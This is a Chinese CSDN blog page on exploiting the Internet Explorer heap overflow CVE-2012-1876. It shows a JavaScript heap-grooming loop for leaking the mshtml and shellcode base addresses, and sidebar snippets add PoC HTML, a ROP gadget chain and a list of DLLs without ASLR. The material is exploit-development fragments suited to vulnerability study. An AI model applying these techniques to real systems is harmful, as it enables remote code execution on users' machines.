cve2012-1876 leak mshtml base address and leak shellcode base address

最新推荐文章于 2023-02-22 11:11:26 发布
最新推荐文章于 2023-02-22 11:11:26 发布
阅读量1.3k 收藏
点赞数
分类专栏: 漏洞利用 文章标签: leak string internet windows null
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/instruder/article/details/7836895
版权




leak mshtml base address 



leak shellcode base address





其中leak shellcode base 思路是联合 http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php 这篇和

这篇 http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php


部分代码如下

for(var i=0;i<3000;i+=4)
{
	fillbuff[i]=string_A.substr(0,125);
	fillbuff[i+1]=string_B.substr(0,125);
	fillbuff[i+2]=string_C.substr(0,125);
	fillbuff[i+3]=selob.cloneNode(true);
}


for(var i=4;i<3000;i+=12)
{
	fillbuff[i]=null;
}



instruder
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve-2012-1876漏洞分析
小强的博客
11-15 1614
关于调试其他文章有,就不重点介绍了,主要介绍一下漏洞原理,汇编代码,以及漏洞的利用过程。 poc.html:   function over_trigger() { var obj_col = document.getElementById("132"); obj_col.width = "42765";
CVE-2012-1876-x86-x64 EXP分析调试1
08-03
CVE-2012-1876 是一个影响Microsoft WindowsInternet Explorer 9的提权漏洞,该漏洞在2012年的Pwn2Own黑客大赛上被法国安全团队Vupen利用,展示了其强大的攻击能力。在赛事结束后,Vupen向微软报告了堆溢出漏洞,...
CVE-2012-1876漏洞分析
weixin_30622107的博客
03-23 165
0.POC文件 1 <html> 2 <body> 3 <table style="table-layout:fixed" > 4 <col id="132" width="41" span="1" >&nbsp </col> 5 </table> 6 <scr...
CVE-2012-1876 Internet Exporter堆溢出漏洞分析
鬼手的博客
08-16 1959
文章目录漏洞描述IE浏览器组件介绍分析环境POC漏洞分析漏洞利用参考资料 漏洞描述 该IE浏览器漏洞的成因在mshtml.dll这个模块的CTableLayout::CalculateMinMax函数里,程序在执行时会以HTML代码中的元素span属性作为循环控制次数向堆中写入数据。如果此span值设置不当,那么就会引发堆溢出问题。 IE浏览器组件介绍 Internet Explorer体系结构的...
Windows Server 2008 R2 CVE-2012-0002/CVE-2012-0152 漏洞处理
weixin_43360094的博客
08-05 4586
处理windows Server CVE-2012-0002、CVE-2012-0152漏洞
CVE-2012-0002
最新发布
龙卷风摧毁停车场
02-22 3078
该漏洞为Windows2012年爆出高危安全漏洞,该漏洞是因为Windows系统的远程桌面协议(RDP, Remote Desktop Protocol)存在缓存溢出漏洞,攻击者可通过向目标操作系统发送特定内容的RDP包造成操作系统蓝屏,利用起来操作简单,危害极大,影响范围极广。远程桌面协议访问内存中未正确初始化或已被删除的对象的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以在目标系统上运行任意代码,攻击者可随后安装程序,查看、更改或删除数据,或者创建拥有完全用户权限的新帐户。
CVE-2012-2122 Mysql身份认证漏洞及利用
凝聚力安全团队
01-25 4267
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞检测msf漏洞利用漏洞加固建议参考链接 漏洞描述   当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
CVE-2012-1823(PHP-CGI远程代码执行)
浅笑996的博客
11-20 4858
基于vulhub漏洞环境: 安装vulhub漏洞环境 https://mp.csdn.net/mdeditor/84102101# CGI模式下的参数: -c 指定php.ini文件的位置 -n 不要加载php.ini文件 -d 指定配置项 -b 启动fastcgi进程 -s 显示文件源码 -T 执行指定次该文件 -h和-? 显示帮助 1.启动漏洞环境 进入 CVE-20...
SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】处理
热门推荐
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
12-30 22万+
概述 SSL/TLS协议信息泄露漏洞(CVE-2016-2183)漏洞: TLS, SSH, IPSec协商及其他产品中使用的DES及Triple DES密码存在大约四十亿块的生日界,这可使远程攻击者通过Sweet32攻击,获取纯文本数据。 风险级别:低 该漏洞又称为SWEET32(https://sweet32.info)是对较旧的分组密码算法的攻击,它使用64位的块大小,缓解SWEET32攻击OpenSSL 1.0.1和OpenSSL 1.0.2中基于DES密码套件从“高”密码字符串组移至“中”;但Op
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
Oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip 是一个针对Oracle数据库系统的重要安全更新。这个补丁主要解决了一个在Oracle 11.2.0.1版本中的严重安全漏洞,该漏洞被标记为CVE-2012-1675...
Oracle Database Server ‘TNS Listener’远程数据投毒漏洞(CVE-2012-1675)的完美解决方法
12-16
### Oracle Database Server ‘TNS Listener’远程数据投毒漏洞(CVE-2012-1675)的完美解决方法 #### 1. 确定解决方案 CVE-2012-1675 是一个针对Oracle数据库服务器TNS Listener的远程数据投毒漏洞。该漏洞允许...
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011...
Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675)的解决文档
05-25
链接:http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html 根据此链接得到解决方法: ? 1234 SolutionRecommendations for protecting against this vulnerability can be found ...
ms10_046_shortcut_icon_dllloader 这个其实很好用
爱杀之爪的矩阵
04-08 3757
Well-known DEP-violating thunks
爱杀之爪的矩阵
04-10 3576
这几天调试发现一个奇怪的现象,一个在数据区段执行的指令,在开启了系统dep时 竟然还可以继续执行,换成其他指令就不可以,而且执行时这个内存属性仍旧是不可 执行属性。同时按理指令是一条一条执行,但是这个指令的执行是跳跃了,瞬间差点毁了 多年的指令执行三观。 debug win7+system dep open Breakpoint 0 hit eax=2e81e
cve-2012-1876 win7_ie8_leak_shellcode code
爱杀之爪的矩阵
08-08 2948
alert("begin") //var div_container = document.getElementById("test"); //div_container.style.cssText = "display:none"; var cloned = new Array(); var selob = document.createElement("select"); selob.w0
MSVCRT:ROP - CN 修改ROP检测标志
爱杀之爪的矩阵
04-08 2432
function getddd() { var kkkkk = unescape("\u0433\u77bf"); kkkkk +=unescape("\u5ed5\u77be"); //xchg eax,esp retn kkkkk += unescape("\uf519\u77be")////pop ecx,retn kkkkk += unescape("\u9ef8\u1009
没有ASLR的几个DLL
爱杀之爪的矩阵
06-22 1310
DpoFeedb.dll        指纹识别 现在买的笔记本都有 MSCOMCTL.OCX 需要用户点一次允许 之后就不需要了 VBE7INTL.DLL    未找到加载方式 迅雷                 mcvcr71.dll java6                 mcvcr71.dll comct232.ocx      需要用户点一次允许 之后就不需要了 com
CVE-2012-1876 Win7 IE9 堆溢出漏洞 EXP详解与x64平台分析
本文主要探讨的是CVE-2012-1876漏洞,这是一个针对Microsoft Windows系统,尤其是Windows 7中的IE9浏览器的0day(零日)漏洞。在2012年的Pwn2Own黑客大赛中,安全团队Vupen成功利用这两个漏洞,其中一个是涉及堆溢出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值